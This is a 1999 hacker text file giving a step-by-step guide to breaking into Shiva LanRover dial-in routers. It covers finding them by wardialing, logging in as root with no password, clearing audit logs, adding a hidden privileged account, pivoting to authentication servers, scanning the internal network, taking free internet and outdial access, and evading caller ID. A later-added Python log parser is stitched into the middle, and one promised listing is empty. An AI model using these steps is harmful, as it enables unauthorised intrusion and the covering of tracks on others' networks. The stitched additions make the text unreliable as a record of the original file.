
Hacking the Shiva-LAN-Rover System

By Hybrid (th0rn@coldmail.com)
April 1999

* Disclaimer:                                    *
*                                                *
* The information provided in this text file     *
* has been obtained from public domain resources *
* and is intended for educational use only.      *
*                                                *


1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world.
If, like me, you have done quite a lot of scanning, you will have come across a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to focus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in its own right, in
the sense that once you have gained access to one of these platforms, you
have the opportunity to explore the entire network on which the system is
based; in essence, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:

@ Userid:

or if RADIUS authentication is enabled:

Starting Radius Authentification....
@ Userid:

Blah, ignore the RADIUS authentication thing for now, it's just a lame
attempt to make the system look as if it has been secured; in most cases the
sysadmin will have misconfigured the authentication and you will be
surprised at how easy it is to get in. So you are at the login prompt,
what next? As in most OSs, Shivas have a nice set of default logins, so the
sysadmin's poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason the root account
works so often is because in some cases the admin is not even aware the
account exists! Most of the system setup is done via the main terminal, so the
admin doesn't have to log in. The root account is not listed in the userfile
database, so most admins overlook it. In some cases the admin will have set
up their own account with something like <admin> <password>, but if the admin
has any common sense you will not get in with that. Like most OSs, Shiva
systems have an audit log, so don't sit there trying to brute force anything;
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've logged on as <root> <no password>, now what?
Read on.

Once logged in, you will be dropped into the Shiva command line prompt, which
should look something like this:

Shiva LanRover/8E, Patch 4.5.4p6 98/06/09  (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)

To get a list of the available commands type <help> or <?>; this will reveal a
menu similar to this:

ShivaLanRover/8E# ? <enter>

alert                          Send text alert to all dial-in users
busy-out line <number>         Busy-out serial line modem
clear <keyword>                Reset part of the system
comment                        Enter a comment into the log
configure                      Enter a configuration session
connect <port pool>            Connect to a shared serial port
crashdump                      Write crashblock to log
disable                        Disable privileges
help                           List of available commands
initialize <keyword>           Reinitialize part of the system
lan-to-lan <keyword>           Manage LAN-to-LAN connections
passwd                         Change password
ping <IP host>                 Send ICMP echo to IP host
ppp                            Start a PPP session
quit                           Quit from shell
reboot                         Schedule reboot
show <keyword>                 Information commands, type "show ?" for list
slip                           Start a SLIP session
telnet <IP host>               Start a Telnet session
testline                       Test a line

The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:

ShivaLanRover/8E# show users <enter>

Line             User                     Activity  Idle/Limit    Up/Limit
   1             jsmith                      PPP       0/   10     0/ None
   2             root                        shell     0/   10     0/ None
Total users: 2

So here we see ourselves logged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dial-in
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, i.e. you can check that the admin is not logged in. Next
you need to get a rough idea of the size of the system and its network. At the
# prompt type:

ShivaLanRover/8E# show lines <enter>

Async Lines:
Line State   Rate/P/Stop/   RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
   1 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   2 CHAR   57600/N/   1/     |ON |ON |on |on |ON |      2|        0|   0
   3 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   4 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   5 IDLE   57600/N/   1/     |OFF|OFF|on |on |OFF|      0|        0|   0
   6 IDLE  115200/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   7 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   8 IDLE  115200/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0

Here we see a list of the modem ports; as you can see it has 8, which is about
average for most Shiva systems. Now that we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is. To do
this type:

ShivaLanRover/8E# show arp <enter>

Protocol   Address            Age  Hardware Addr      Type    Interface
Internet                      4m   x0-x0-B0-2x-Dx-78  ARPA    Ethernet:IP
Internet                      4m   AA-0x-x4-00-0C-04  ARPA    Ethernet:IP
Internet                      4m   Ax-00-04-0x-xD-x4  ARPA    Ethernet:IP
Internet                      10m  AA-x0-04-00-0C-04  ARPA    Ethernet:IP
Internet                      0m   AA-00-04-00-x1-04  ARPA    Ethernet:IP
Internet                      4m   00-80-5x-31-F8-Ax  ARPA    Ethernet:IP
Internet                      4m   00-80-5x-FE-C9-x8  ARPA    Ethernet:IP
Internet                      0m   00-x0-A3-xF-21-C8  ARPA    Ethernet:IP
Internet                      4m   00-x0-B0-01-36-3x  ARPA    Ethernet:IP

Showing the ARP cache reveals some of the boxes connected to the LAN, as well
as their Ethernet addresses and the type of protocol. Now that we have
established the kind of system we are on, it's time to do some exploring,
which is where the real content of this file begins.

2. What can Shiva lan rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:

PPP (Point-to-Point Protocol). This is the key to gaining access to the
network on which the Shiva is based; in most cases the network will have
an internal DNS server, and if you are lucky, the network the system is
on will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.

Modem Outdial. In a lot of cases the system will have been configured to
allow modem outdialing, which can be good for calling BBSs, diverting to
other dialups, scanning, but again, this is lame; just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.

It's time to go into detail about all of the Shiva's functions and commands. I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.

3. The command line

When logged into the Shiva shell, you have the following commands at your

alert (Send text alert to all dial-in users) - Self explanatory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)

The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc. To do this all you need to do is type <clear log>. This
will erase and reset the audit log, including any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc., but these will
all cause system problems and get you noticed, so best leave them alone for
the time being.

comment (Enter a comment into the log)
configure (Enter a configuration session)

Here's the part where you get the system to do what you want it to do, i.e.
to get a PPP connection you will need to set up another account with shell
and PPP privileges. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account; using the config command you can create a new
user account with greater privileges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system; you don't want to make an account that will stick out from the other
accounts, so type:

show security <enter> (this gives a list of the security configuration and
the user list.) You should see something like this:



Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one as well. The idea is to make an account
that will blend in with the others and not look too obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc.; more
on these options in a bit. OK, now we need to set up our own account; to do
this we need to enter a configuration session. At the command line prompt
type: ShivaLanRover/8E# config <enter>

You will then drop into the configuration session.

Enter configuration file lines.  Edit using:
^X, ^U      clear line
^H, DEL     delete one character
^W          delete one word
^R          retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.

config> (here is where you enter the config commands; to make your own account
do the following)

config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)

Review configuration changes [y/n]? y
New configuration parameters:
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.

You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password; you can change this later. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, and if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now that your account has been set up, all you do is re-connect
to the system and log in as your username; more on this later.

connect <PhoneGroup pool> (Connect to a serial port or modem)

This is another one of the good features of Shivas: you can remotely control
a series of modems on the system, and in a lot of cases dial out. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter>. You will then drop into
one of the modem pools, as follows:

Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.

(here basic modem commands are necessary; use the following to dial out)

ATZ (initialise modem)
ATDTxxxxxxxxx (ATDT then phone number). Note that in some cases the modem
outdial will go through the system PBX, so sometimes you will have to figure
out the outdialing code, which should be something simple like dialing a 9
before the number you want to connect to. To disconnect from the outdialing
session type control C, or ^C. This will take you back to the command line. As
with the other system events, outdialing is logged in the audit file, along
with the number you called. It is generally a good idea to clear the audit log
after things like PPP or dialout; again just type clear log <enter>.

cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privileges)
dmc <keyword> (Information commands, type "dmc ?" for list)

        down <slot> <firstmodem> (last Remove modems from CCB pool)
        info <slot> <modem> (Print info for specified modem)
        mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
        state (Print state of a modem)
        status (Print status of all modems)
        trace (Trace message passing)
        up <slot> <firstmodem> (lastmo Add modems to CCB pool)
        test_1slot <slot> (Tests DMC card in slot specified)
        test_allcards (Tests all DMC cards found in system)
        test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
        test_loopall <count 0-99> (Tests All DMC's for count)
        test_modempair <slot1> (modem1 Tests modems against each other)
        test_slotpair <slot1> <slot2> (Tests a DMC card against another)
        test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)

help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)

        close <nickname> (Close tunnel to L2F HG)
        login (Start L2F session)
        tunnels (Show open tunnels)

lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)

account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)

The show config command will reveal all the system configuration setups,
including DNS server information, security configuration, IP routing etc.
It will also show the internal IPs of the RADIUS authentication and TACACS
servers.

finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is,
type show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are; it is a good idea to note the IP

lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)

The show log command will display the system audit log. Here you will be able
to see what is going on on the system, i.e. whether it is primarily used for
PPP, dialout etc. If users use the system for outdialing, you can even see the
numbers that they dial. Here is a cut-down example of what you would see in a
system log file:

Mon 15 16:24:29 GMT 1998 4530  Serial4: "krad" logged in
00:01  4531  Serial4:PPP: Received LCP Code Reject for code 0D
00:01  4532  Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00  4533  Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00  4534  Serial4:PPP: IPCP layer up
00:04  4535  Serial4:PPP: CCP layer up
14:09  4536  Serial4:PPP: IPCP layer down
00:00  4537  Serial4:PPP: CCP layer down
00:00  4538  Serial4:PPP: LCP layer down
00:01  4539  Serial4:PPP: CD dropped on connection
00:00  4540  Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06  4541  Serial4: Rate 115200bps
00:00  4542  Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01  4543  Serial4: Initialized modem
04:56  4544  setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27  4545  Serial4: New Dial-In session
00:00  4546  Serial4:PPP: LCP layer up
00:00  4547  Serial4: "krad" logged in
00:01  4548  Serial4:PPP: Received LCP Code Reject for code 0C
00:00  4549  Dialin:IPX configured net 9823O049
00:00  4550  Serial4:PPP: IPXCP layer up
00:00  4670  Serial4: New Command Shell session
00:03  4671  Serial4: "root" logged in
01:38  4672  Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06  4673  Serial4: Rate 115200bps
00:01  4674  Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00  4675  Serial4: Initialized modem
55:11  4676  Could not parse IP SNMP request.

In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.
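As an added example (not part of the original file), here is a small Python parser for the show log format above, written from the admin's side: it accumulates the per-entry mm:ss figures into offsets, pairs the quoted "logged in"/"logged out" events on each serial line into sessions, and pulls out any session of the unlisted root account. The sample log is constructed in the page's format, and treating the leading mm:ss as time elapsed since the previous entry is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the "show log" format shown above (abridged, so the
# sequence numbers skip; the figures are made up for the example).
SAMPLE_LOG = """\
Mon 15 16:24:29 GMT 1998 4530  Serial4: "krad" logged in
00:04  4535  Serial4:PPP: CCP layer up
14:13  4540  Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
18:27  4545  Serial4: New Dial-In session
00:00  4547  Serial4: "krad" logged in
00:00  4670  Serial4: New Command Shell session
00:03  4671  Serial4: "root" logged in
01:38  4672  Serial4: "root" logged out: user exit after 01:42 (Command Shell)
55:11  4676  Could not parse IP SNMP request.
"""

# Assumption: the first entry carries an absolute timestamp and each later
# entry's leading mm:ss is the time elapsed since the previous entry.
ANCHOR_RE = re.compile(r"^\S+ \d+ \d\d:\d\d:\d\d \S+ \d{4}\s+(\d+)\s+(.*)$")
DELTA_RE = re.compile(r"^(\d+):(\d\d)\s+(\d+)\s+(.*)$")
LINE_RE = re.compile(r"^(Serial\d+):\s*(.*)$")
LOGIN_RE = re.compile(r'^"([^"]+)" logged in$')
LOGOUT_RE = re.compile(r'^"([^"]+)" logged out: .* after (\d+):(\d\d) \((.*)\)$')


@dataclass
class Session:
    user: str
    line: str
    start_seq: int
    start_offset: int                 # seconds since the excerpt's first entry
    end_seq: Optional[int] = None     # None while the session is still open
    duration: Optional[int] = None    # seconds, from the logout line's "after mm:ss"
    kind: Optional[str] = None        # "Dial-In PPP", "Command Shell", ...


def parse_log(text: str) -> list:
    """Return (seq, offset_seconds, serial_line_or_None, message) per entry."""
    entries, offset = [], 0
    for raw in text.splitlines():
        m = ANCHOR_RE.match(raw)
        if m:
            seq, msg = int(m.group(1)), m.group(2)
        else:
            m = DELTA_RE.match(raw)
            if not m:
                continue                      # blank line or pager noise
            offset += int(m.group(1)) * 60 + int(m.group(2))
            seq, msg = int(m.group(3)), m.group(4)
        lm = LINE_RE.match(msg)
        entries.append((seq, offset) + ((lm.group(1), lm.group(2)) if lm else (None, msg)))
    return entries


def sessions(entries: list) -> list:
    """Pair "logged in" / "logged out" events per serial line into Sessions."""
    result, open_by_line = [], {}
    for seq, offset, line, text in entries:
        li = LOGIN_RE.match(text) if line else None
        if li:
            s = Session(li.group(1), line, seq, offset)
            result.append(s)
            open_by_line[line] = s        # an earlier open session on this line stays open
            continue
        lo = LOGOUT_RE.match(text) if line else None
        if lo:
            s = open_by_line.pop(line, None)
            if s and s.user == lo.group(1):
                s.end_seq = seq
                s.duration = int(lo.group(2)) * 60 + int(lo.group(3))
                s.kind = lo.group(4).strip(" ,")
    return result


def root_sessions(sess: list) -> list:
    # The check an admin wants from this log: the unlisted root account used over a line.
    return [s for s in sess if s.user == "root"]
```

A session left with end_seq None never saw a matching logout in the excerpt, which is also what a cleared log looks like from the outside.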

modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)

slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including RADIUS authentication, SecurID, TACACS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the RADIUS authentication server. In this case, the setup would look something
like this:

   [RADIUS Authentification Server]    } The server contains a secured user
      |                                  list, which will be used to verify
      |                                  login requests. The login is 
   [Router]                              determined if the user can be 
    |   |                                verified by the server.
    |   |                   } The Shiva sends the login request to RADIUS.
   [Shiva System]           } Starting Radius Authentification... @ Userid:

Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the RADIUS server, a secondary Shiva may be installed to act as the security
server, and all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have logged into a system, but
the above setup has been implemented. For example, say you logged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security>. If
the verification server has been set up, there will be no users in the user
list; instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification server, or primary Shiva, just use the show config command. You
can then telnet from the Shiva you are on to the Shiva displayed in the
config file; you should then get the @ Userid: login screen again, so try root
no pass. If this does not work, it is possible to temporarily configure your
own server on the network, but this would mean other users will not be able
to log in, so leave this alone. If you do manage to log in to the server as
root, you have to set up your user account there, because that is where all
the Shivas on the network refer to in order to verify users; this way the
admin only has to maintain one user configuration file.

5. PPP

Once you have set up a user account with shell and PPP privileges, you can
begin exploring the network on which the Shiva is based. If the network
is net connected you can get free net access as well, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network or port scanner across the domain which the Shiva
is on. As on most networks, you are likely to come across a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers; in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to simultaneously dial out across the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. Using
the <connect all_ports> command will give you control over the system modems;
then you can dial out as if you were in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dial up to the system directly. The mistake people make when it comes to ANI,
or CLID, is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong*: the ANI service can be set up by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationally, so your originating CLID gets stripped at intraLATA
boundaries on the PSTN. A technique which I don't wanna give out involves
trunk and carrier hopping. Well, that's about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com; they will have technical guides in PDF format, and you can
also download the Shiva software from their FTP site.

Shouts to the following:

[9x] substance phriend siezer vectorx statd
     blotter knight network specialK microdot
     katkiller xramlrak bosplaya deadsoul and
     nino the 9x g1mp.

[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.

[D4RKCYDE] downtime elf zomba force mortis
           angel dohboy brakis alphavax
           tonekilla bishopofhell sintax
           digitalfokus mistress.


* hybrid_blue@hotmail.com  | DSS: 0x5493F1307 *
* th0rn@coldmail.com       | D-H: 0x8B314ED9  *
* hybrid@darkcyde.org      | RSA: 0xA42A953D  *
* th0rn@cyberspace.org     |                  *
* www2.dope.org/9x         | 1999-02-09       *
* www.darkcyde.8m.com      |                  *

                    ___ ___ _____.___.____________________  ____________
hybrid@b4b0.org    /   |   \\__  |   |\______   \______   \/_   \______ \
hybrid@ninex.com  /    ~    \/   |   | |    |  _/|       _/ |   ||    |  \
hybrid.dtmf.org   \    Y    /\____   | |    |   \|    |   \ |   ||    `   \
----------------   \___|_  / / ______| |______  /|____|_  / |___/_______  /
                         \/  \/               \/        \/              \/
